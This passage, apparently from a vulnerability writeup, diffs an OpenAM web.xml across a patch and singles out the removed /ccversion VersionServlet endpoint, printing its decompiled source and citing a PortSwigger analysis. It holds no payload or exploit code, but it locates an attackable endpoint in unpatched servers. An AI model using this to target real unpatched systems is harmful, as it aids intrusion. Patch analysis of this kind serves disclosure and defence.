<param-name>methods</param-name> - <param-value>POST,PUT</param-value> - </init-param> - <init-param> - <description> - Accepted Origins (Required): - A comma separated list of origins from which to accept CORS requests. - </description> - <param-name>origins</param-name> - <param-value>http://www.example.net,https://example.org:8433</param-value> - </init-param> - <init-param> - <description> - Allow Credentials (Optional): - Whether to include the Vary (Origin) and Access-Control-Allow-Credentials headers in the response. - Default: false - </description> - <param-name>allowCredentials</param-name> - <param-value>false</param-value> - </init-param> - <init-param> - <description> - Allowed Headers (Optional): - A comma separated list of HTTP headers which can be included in the requests. - </description> - <param-name>headers</param-name> - <param-value>headerOne,headerTwo,headerThree</param-value> - </init-param> - <init-param> - <description> - Expected Hostname (Optional): - The name of the host expected in the request Host header. - </description> - <param-name>expectedHostname</param-name> - <param-value>openam.example.com:8080</param-value> - </init-param> - <init-param> - <description> - Exposed Headers (Optional): - The comma separated list of headers which the user-agent can expose to its CORS client. - </description> - <param-name>exposeHeaders</param-name> - <param-value>exposeHeaderOne,exposeHeaderTwo</param-value> - </init-param> - <init-param> - <description> - Maximum Cache Age (Optional): - The maximum time that the CORS client can cache the pre-flight response, in seconds. - Default: 600 - </description> - <param-name>maxAge</param-name> - <param-value>600</param-value> - </init-param> - </filter> - --> <filter> <filter-name>AuditContextFilter</filter-name> <filter-class>org.forgerock.openam.audit.context.AuditContextFilter</filter-class> @@ -308,9 +184,9 @@ <url-pattern>/*</url-pattern> </filter-mapping> - <!-- Access audit filter for JATO, Debug.jsp and ssoadm.jsp pages --> + <!-- Access audit filter for Debug.jsp and ssoadm.jsp pages --> <filter> - <filter-name>JatoAuditFilter</filter-name> + <filter-name>DebugAuditFilter</filter-name> <filter-class>org.forgerock.openam.audit.servlet.AuditAccessServletFilter</filter-class> <init-param> <param-name>auditing-component</param-name> @@ -318,36 +194,12 @@ </init-param> </filter> <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/service/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/federation/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/realm/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/agentconfig/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/sts/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/delegation/*</url-pattern> + <filter-name>DebugAuditFilter</filter-name> + <url-pattern>/Debug.jsp</url-pattern> </filter-mapping> <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/idm/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/Debug.jsp</url-pattern> + <filter-name>DebugAuditFilter</filter-name> + <url-pattern>/Logback.jsp</url-pattern> </filter-mapping> <filter> <filter-name>SsoAdmJspAuditFilter</filter-name> @@ -366,15 +218,13 @@ <filter-name>amSetupFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> - <!-- <filter-mapping> - <filter-name>CORSFilter</filter-name> - <url-pattern>/json/*</url-pattern> + <filter-name>FQDNValidationFilter</filter-name> + <url-pattern>/XUI/*</url-pattern> </filter-mapping> - --> <filter-mapping> <filter-name>FQDNValidationFilter</filter-name> - <url-pattern>/XUI/*</url-pattern> + <url-pattern>/ui-admin/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>FQDNValidationFilter</filter-name> @@ -402,14 +252,23 @@ <filter-name>NoSniffFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>CachePrivate</filter-name> + <url-pattern>/json/*</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>ResponseValidationFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> + <!-- The DisableSameSiteCookiesFilter should always come before the SecureCookieFilter --> <filter-name>DisableSameSiteCookiesFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>SecureCookieFilter</filter-name> + <url-pattern>/*</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>CacheForFiveMinutes</filter-name> <url-pattern>/XUI/index.html</url-pattern> @@ -420,6 +279,10 @@ <url-pattern>/ui-admin/*</url-pattern> <url-pattern>/XUI/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>CacheForFiveMinutes</filter-name> + <url-pattern>/ui-admin/index.html</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>NotificationsWebSocketFilter</filter-name> <url-pattern>/notifications</url-pattern> @@ -445,10 +308,6 @@ <!-- listener declaration --> - <servlet> - <servlet-name>LoginServlet</servlet-name> - <servlet-class>com.sun.identity.authentication.UI.LoginServlet</servlet-class> - </servlet> <servlet> <servlet-name>setSetupProgress</servlet-name> <servlet-class>com.sun.identity.setup.SetSetupProgress</servlet-class> @@ -528,121 +387,6 @@ <servlet-class>com.sun.identity.configuration.MonitoringFedConfigurator</servlet-class> <load-on-startup>30</load-on-startup> </servlet> - <servlet> - <description>CDCServlet</description> - <servlet-name>cdcservlet</servlet-name> - <servlet-class>com.iplanet.services.cdc.CDCServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLAwareServlet</description> - <servlet-name>SAMLAwareServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLAwareServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLPOSTProfileServlet</description> - <servlet-name>SAMLPOSTProfileServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLPOSTProfileServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLSOAPReceiver</description> - <servlet-name>SAMLSOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLSOAPReceiver</servlet-class> - </servlet> - <servlet> - <description>AssertionManagerServlet</description> - <servlet-name>AssertionManagerServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.AssertionManagerServlet</servlet-class> - </servlet> - <servlet> - <description>FSAssertionManagerServlet</description> - <servlet-name>FSAssertionManagerServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.FSAssertionManagerServlet</servlet-class> - </servlet> - <servlet> - <description>SecurityTokenManagerServlet</description> - <servlet-name>SecurityTokenManagerServlet</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.security.SecurityTokenManagerServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>preLoginHandler</servlet-name> - <servlet-class>com.sun.identity.federation.login.FSPreLoginHandler</servlet-class> - </servlet> - <servlet> - <servlet-name>postLoginHandler</servlet-name> - <servlet-class>com.sun.identity.federation.login.FSPostLoginHandler</servlet-class> - </servlet> - <servlet> - <servlet-name>ProcessLogout</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSProcessLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ReturnLogout</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSReturnLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SingleSignOnService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSSSOAndFedService</servlet-class> - </servlet> - <servlet> - <servlet-name>IntersiteTransferService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSIntersiteTransferService</servlet-class> - </servlet> - <servlet> - <servlet-name>AssertionConsumerService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSAssertionConsumerService</servlet-class> - </servlet> - <servlet> - <servlet-name>SOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.federation.services.FSSOAPReceiver</servlet-class> - </servlet> - <servlet> - <servlet-name>FederationTerminationServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationInitiationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ProcessTermination</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationRequestServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ReturnTermination</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationReturnServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>InitiateRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationInitiationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ProcessRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationRequestServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ReturnRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationReturnServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>LogoutServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSSingleLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>WSSOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.soapbinding.SOAPReceiver</servlet-class> - </servlet> - <servlet> - <servlet-name>WSPRedirectHandler</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.interaction.WSPRedirectHandlerServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>IDPFinderService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSIDPFinderService</servlet-class> - </servlet> - <servlet> - <servlet-name>idffwriter</servlet-name> - <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>idffreader</servlet-name> - <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieReaderServlet</servlet-class> - </servlet> <servlet> <servlet-name>saml2writer</servlet-name> <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class> @@ -814,10 +558,6 @@ <servlet-name>LoginLogoutMapping</servlet-name> <url-pattern>/logout</url-pattern> </servlet-mapping> - <servlet-mapping> - <servlet-name>LoginServlet</servlet-name> - <url-pattern>/UI/*</url-pattern> - </servlet-mapping> <servlet-mapping> <servlet-name>AMSetupServlet</servlet-name> <url-pattern>/config/configurator</url-pattern> @@ -1025,114 +765,6 @@ <servlet-name>spsaehandler</servlet-name> <url-pattern>/spsaehandler/*</url-pattern> </servlet-mapping> - <servlet-mapping> - <servlet-name>IDPFinderService</servlet-name> - <url-pattern>/idpfinder</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>cdcservlet</servlet-name> - <url-pattern>/cdcservlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLAwareServlet</servlet-name> - <url-pattern>/SAMLAwareServlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLPOSTProfileServlet</servlet-name> - <url-pattern>/SAMLPOSTProfileServlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLSOAPReceiver</servlet-name> - <url-pattern>/SAMLSOAPReceiver</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AssertionManagerServlet</servlet-name> - <url-pattern>/AssertionManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FSAssertionManagerServlet</servlet-name> - <url-pattern>/FSAssertionManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SecurityTokenManagerServlet</servlet-name> - <url-pattern>/SecurityTokenManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>preLoginHandler</servlet-name> - <url-pattern>/preLogin</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>postLoginHandler</servlet-name> - <url-pattern>/postLogin/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessLogout</servlet-name> - <url-pattern>/ProcessLogout/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnLogout</servlet-name> - <url-pattern>/ReturnLogout/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>LogoutServlet</servlet-name> - <url-pattern>/liberty-logout</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SingleSignOnService</servlet-name> - <url-pattern>/SingleSignOnService/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>IntersiteTransferService</servlet-name> - <url-pattern>/IntersiteTransferService</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AssertionConsumerService</servlet-name> - <url-pattern>/AssertionConsumerService/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SOAPReceiver</servlet-name> - <url-pattern>/SOAPReceiver/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FederationTerminationServlet</servlet-name> - <url-pattern>/federation-terminate</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessTermination</servlet-name> - <url-pattern>/ProcessTermination/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnTermination</servlet-name> - <url-pattern>/ReturnTermination/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>InitiateRegistration</servlet-name> - <url-pattern>/InitiateRegistration</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessRegistration</servlet-name> - <url-pattern>/ProcessRegistration/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnRegistration</servlet-name> - <url-pattern>/ReturnRegistration/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSSOAPReceiver</servlet-name> - <url-pattern>/Liberty/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSPRedirectHandler</servlet-name> - <url-pattern>/WSPRedirectHandler/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>idffwriter</servlet-name> - <url-pattern>/idffwriter</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>idffreader</servlet-name> - <url-pattern>/idffreader</url-pattern> - </servlet-mapping> <servlet-mapping> <servlet-name>saml2writer</servlet-name> <url-pattern>/saml2writer</url-pattern> @@ -1164,30 +796,6 @@ <!-- end of servlet mapping --> - <servlet> - <servlet-name>WebFinger</servlet-name> - <servlet-class>org.restlet.ext.servlet.ServerServlet</servlet-class> - - <!-- Your application class name (Optional - For mode 3) --> - <init-param> - <param-name>org.restlet.application</param-name> - <param-value>org.forgerock.openidconnect.restlet.WebFinger</param-value> - </init-param> - - <!-- List of supported client protocols (Optional - Only in mode 3) --> - <init-param> - <param-name>org.restlet.clients</param-name> - <param-value>RIAP CLAP</param-value> - </init-param> - - <!-- Add the Servlet context path to routes (Optional) --> - <init-param> - <param-name>org.restlet.autoWire</param-name> - <param-value>true</param-value> - </init-param> - - </servlet> - <servlet> <servlet-name>OAuth2RegisterClient</servlet-name> <jsp-file>/oauth2/registerClient.jsp</jsp-file> @@ -1200,14 +808,9 @@ <!-- servlet declaration --> - <servlet-mapping> - <servlet-name>WebFinger</servlet-name> - <url-pattern>/.well-known/*</url-pattern> - </servlet-mapping> - <servlet> <servlet-name>OpenAM</servlet-name> - <servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class> + <servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class> <init-param> <param-name>application-loader</param-name> <param-value>guice</param-value> @@ -1238,90 +841,22 @@ <servlet-name>OpenAM</servlet-name> <url-pattern>/sts-tokengen/*</url-pattern> </servlet-mapping> - - <!-- Console --> - <servlet-mapping> - <servlet-name>AuthServlet</servlet-name> - <url-pattern>/authentication/*</url-pattern> - </servlet-mapping> <servlet-mapping> - <servlet-name>AMBaseServlet</servlet-name> - <url-pattern>/base/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SCServlet</servlet-name> - <url-pattern>/service/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SMServlet</servlet-name> - <url-pattern>/session/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>RMServlet</servlet-name> - <url-pattern>/realm/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>PMServlet</servlet-name> - <url-pattern>/policy/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>IDMServlet</servlet-name> - <url-pattern>/idm/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>UMServlet</servlet-name> - <url-pattern>/user/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>DelegationServlet</servlet-name> - <url-pattern>/delegation/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>TaskServlet</servlet-name> - <url-pattern>/task/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AgentConfigurationServlet</servlet-name> - <url-pattern>/agentconfig/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>VersionServlet</servlet-name> - <url-pattern>/ccversion/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FSServlet</servlet-name> - <url-pattern>/federation/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSServlet</servlet-name> - <url-pattern>/webservices/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>STSServlet</servlet-name> - <url-pattern>/sts/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AuditServlet</servlet-name> - <url-pattern>/audit/*</url-pattern> - </servlet-mapping> - <!-- End console --> - - <servlet> - <servlet-name>ForgeRockRest</servlet-name> - <servlet-class>org.forgerock.openam.rest.RestEndpointServlet</servlet-class> - </servlet> - <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/xacml/*</url-pattern> </servlet-mapping> <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/oauth2/*</url-pattern> </servlet-mapping> <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/uma/*</url-pattern> </servlet-mapping> + <servlet-mapping> + <servlet-name>OpenAM</servlet-name> + <url-pattern>/.well-known/*</url-pattern> + </servlet-mapping> <!-- Setup favicon.ico extension type --> <mime-mapping> @@ -1335,106 +870,6 @@ </welcome-file> </welcome-file-list> - <!-- The taglib is only specified once --> - <jsp-config> - <taglib> - <taglib-uri>/WEB-INF/jato.tld</taglib-uri> - <taglib-location>/WEB-INF/jato.tld</taglib-location> - </taglib> - <taglib> - <taglib-uri>/WEB-INF/cc.tld</taglib-uri> - <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location> - </taglib> - - <!-- workarounds for lockart 2.x --> - <taglib> - <taglib-uri>/WEB-INF/tld/com_iplanet_jato/jato.tld</taglib-uri> - <taglib-location>/WEB-INF/jato.tld</taglib-location> - </taglib> - <taglib> - <taglib-uri>/WEB-INF/tld/com_sun_web_ui/cc.tld</taglib-uri> - <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location> - </taglib> - <!-- taglib definition --> - </jsp-config> - <!-- comment it out due to issue 4891 in WAS/JBOSS/Geronimo - <resource-ref> - <description>mysql db idrepo</description> - <res-ref-name>jdbc/openssousersdb</res-ref-name> - <res-type>javax.sql.DataSource</res-type> - <res-auth>Container</res-auth> - <res-sharing-scope>Shareable</res-sharing-scope> - </resource-ref> - --> - - <!-- Console --> - <servlet> - <servlet-name>UMServlet</servlet-name> - <servlet-class>com.sun.identity.console.user.UMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AuthServlet</servlet-name> - <servlet-class>com.sun.identity.console.authentication.AuthServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AMBaseServlet</servlet-name> - <servlet-class>com.sun.identity.console.base.AMBaseServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SCServlet</servlet-name> - <servlet-class>com.sun.identity.console.service.SCServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SMServlet</servlet-name> - <servlet-class>com.sun.identity.console.session.SMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>RMServlet</servlet-name> - <servlet-class>com.sun.identity.console.realm.RMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>PMServlet</servlet-name> - <servlet-class>com.sun.identity.console.policy.PMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>IDMServlet</servlet-name> - <servlet-class>com.sun.identity.console.idm.IDMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>DelegationServlet</servlet-name> - <servlet-class>com.sun.identity.console.delegation.DelegationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AgentConfigurationServlet</servlet-name> - <servlet-class>com.sun.identity.console.agentconfig.AgentConfigurationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>TaskServlet</servlet-name> - <servlet-class>com.sun.identity.console.task.TaskServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>VersionServlet</servlet-name> - <servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>FSServlet</servlet-name> - <servlet-class>com.sun.identity.console.federation.FSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>WSServlet</servlet-name> - <servlet-class>com.sun.identity.console.webservices.WSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>STSServlet</servlet-name> - <servlet-class>com.sun.identity.console.sts.STSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AuditServlet</servlet-name> - <servlet-class>com.sun.identity.console.audit.AuditServlet</servlet-class> - </servlet> - - <!-- End console --> - <!-- Start errors --> <error-page> <error-code>404</error-code>
The ccversion endpoint was notably removed:
- <servlet-mapping> - <servlet-name>VersionServlet</servlet-name> - <url-pattern>/ccversion/*</url-pattern> - </servlet-mapping>
The original VersionServlet can be seen here:
package WEB-INF.classes.com.sun.identity.console.version; import com.iplanet.jato.CompleteRequestException; import com.iplanet.jato.RequestContext; import com.iplanet.jato.RequestContextImpl; import com.iplanet.jato.ViewBeanManager; import com.iplanet.jato.view.ViewBean; import com.sun.identity.console.base.AMViewBeanBase; import com.sun.identity.console.version.VersionViewBean; import com.sun.web.ui.servlet.version.VersionServlet; import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServletRequest; public class VersionServlet extends VersionServlet { protected void initializeRequestContext(RequestContext requestContext) { super.initializeRequestContext(requestContext); ViewBeanManager viewBeanManager = new ViewBeanManager(requestContext, getPackageName(com.sun.identity.console.version.VersionServlet.class.getName())); ((RequestContextImpl)requestContext).setViewBeanManager(viewBeanManager); } protected void onRequestHandlerNotFound(RequestContext requestContext, String handlerName) throws ServletException { AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotFound: " + handlerName); } protected void onRequestHandlerNotSpecified(RequestContext requestContext) throws ServletException { AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotSpecified"); } protected void onUncaughtException(RequestContext requestContext, Exception e) throws ServletException, IOException { HttpServletRequest httpRequest = requestContext.getRequest(); AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e); String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMUncaughtException"; requestContext.getResponse().sendRedirect(redirectUrl); } protected void onPageSessionDeserializationException(RequestContext requestContext, ViewBean viewBean, Exception e) throws ServletException, IOException { HttpServletRequest httpRequest = requestContext.getRequest(); AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e); String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL"; requestContext.getResponse().sendRedirect(redirectUrl); throw new CompleteRequestException(); } protected void onSessionTimeout(RequestContext requestContext) throws ServletException {} }
More details can be found in the PortSwigger writeup.
